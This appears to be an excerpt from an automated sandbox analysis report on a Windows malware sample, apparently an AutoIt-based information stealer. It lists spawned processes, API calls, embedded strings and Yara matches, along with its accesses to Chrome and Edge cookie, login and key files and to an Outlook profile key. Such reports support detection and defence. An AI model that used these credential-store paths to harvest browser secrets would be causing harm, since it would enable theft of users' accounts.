Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe" Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
Source: enkJ6J7dAn.exe, avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259788515.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589521835.0000000000F21000.00000002.00000001.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4589842860.00000000019A1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: enkJ6J7dAn.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW, 0_2_004720DB
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00472C3F GetUserNameW, 0_2_00472C3F
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache, 0_2_0041E364
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: enkJ6J7dAn.exe Binary or memory string: WIN_XP
Source: enkJ6J7dAn.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
Source: enkJ6J7dAn.exe Binary or memory string: WIN_XPe
Source: enkJ6J7dAn.exe Binary or memory string: WIN_VISTA
Source: enkJ6J7dAn.exe Binary or memory string: WIN_7
Source: enkJ6J7dAn.exe Binary or memory string: WIN_8

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_004652BE
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00476619
Source: C:\Users\user\Desktop\enkJ6J7dAn.exe Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0046CEF3
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs